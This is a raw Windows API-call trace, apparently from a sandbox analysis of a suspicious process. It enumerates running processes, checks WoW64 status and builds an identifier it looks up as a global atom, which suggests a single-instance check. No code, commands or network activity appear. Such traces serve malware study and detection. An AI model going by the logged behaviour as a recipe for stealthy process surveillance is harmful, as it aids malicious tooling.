	[0126.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b59e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.191] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.191] CloseHandle (hObject=0x69c) returned 1
	[0126.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d248, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0126.191] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.191] CloseHandle (hObject=0x69c) returned 1
	[0126.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0126.192] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.192] CloseHandle (hObject=0x69c) returned 1
	[0126.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b97a8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0126.192] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.192] CloseHandle (hObject=0x69c) returned 1
	[0126.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.192] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.193] GetLastError () returned 0x5
	[0126.194] GetLastError () returned 0x5
	[0126.194] GetLastError () returned 0x5
	[0126.194] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.194] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0126.194] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0126.194] GetLastError () returned 0x5
	[0126.194] GetLastError () returned 0x5
	[0126.194] GetLastError () returned 0x5
	[0126.194] GetLastError () returned 0x5
	[0126.194] GetLastError () returned 0x5
	[0126.194] GetLastError () returned 0x5
	[0126.194] GetLastError () returned 0x5
	[0126.194] GetLastError () returned 0x5
	[0126.194] GetLastError () returned 0x5
	[0126.194] GetLastError () returned 0x5
	[0126.194] GetLastError () returned 0x5
	[0126.194] GetLastError () returned 0x5
	[0126.194] GetLastError () returned 0x5
	[0126.194] GetLastError () returned 0x5
	[0126.194] GetLastError () returned 0x5
	[0126.194] GetLastError () returned 0x5
	[0126.194] GetLastError () returned 0x5
	[0126.194] GetLastError () returned 0x5
	[0126.194] GetLastError () returned 0x5
	[0126.194] GetLastError () returned 0x5
	[0126.194] GetLastError () returned 0x5
	[0126.194] GetLastError () returned 0x5
	[0126.194] GetLastError () returned 0x5
	[0126.194] GetLastError () returned 0x5
	[0126.194] GetLastError () returned 0x5
	[0126.194] GetLastError () returned 0x5
	[0126.194] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.195] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetLastError () returned 0x5
	[0126.196] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.197] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0126.197] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.197] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0126.197] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0126.197] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0126.197] CloseHandle (hObject=0x69c) returned 1
	[0126.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0126.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.198] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.198] CloseHandle (hObject=0x69c) returned 1
	[0126.198] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d668, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.198] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.198] CloseHandle (hObject=0x69c) returned 1
	[0126.198] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0126.198] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.198] CloseHandle (hObject=0x69c) returned 1
	[0126.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.199] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.199] CloseHandle (hObject=0x69c) returned 1
	[0126.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5970, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0126.199] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.199] CloseHandle (hObject=0x69c) returned 1
	[0126.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d368, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0126.230] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16d78) returned 0xc0000004
	[0126.230] VirtualAlloc (lpAddress=0x0, dwSize=0x16e78, flAllocationType=0x3000, flProtect=0x4) returned 0x3c30000
	[0126.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c30000, Length=0x16e78, ResultLength=0x0 | out: SystemInformation=0x3c30000, ResultLength=0x0) returned 0x0
	[0126.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0126.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5bb0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0126.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.236] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.236] CloseHandle (hObject=0x69c) returned 1
	[0126.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d4a8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0126.237] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.237] CloseHandle (hObject=0x69c) returned 1
	[0126.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d248, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0126.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.237] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.238] CloseHandle (hObject=0x69c) returned 1
	[0126.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.238] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.238] CloseHandle (hObject=0x69c) returned 1
	[0126.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.238] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.238] CloseHandle (hObject=0x69c) returned 1
	[0126.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.239] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.239] CloseHandle (hObject=0x69c) returned 1
	[0126.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d248, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0126.239] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.239] CloseHandle (hObject=0x69c) returned 1
	[0126.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.239] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.239] CloseHandle (hObject=0x69c) returned 1
	[0126.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.240] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.240] CloseHandle (hObject=0x69c) returned 1
	[0126.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.240] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.240] CloseHandle (hObject=0x69c) returned 1
	[0126.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.241] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.241] CloseHandle (hObject=0x69c) returned 1
	[0126.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d248, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.241] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.241] CloseHandle (hObject=0x69c) returned 1
	[0126.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.241] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.242] CloseHandle (hObject=0x69c) returned 1
	[0126.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d248, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0126.242] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.242] CloseHandle (hObject=0x69c) returned 1
	[0126.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b97a8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0126.242] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.242] CloseHandle (hObject=0x69c) returned 1
	[0126.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d248, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.243] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.243] CloseHandle (hObject=0x69c) returned 1
	[0126.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.243] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.243] CloseHandle (hObject=0x69c) returned 1
	[0126.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.244] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.244] CloseHandle (hObject=0x69c) returned 1
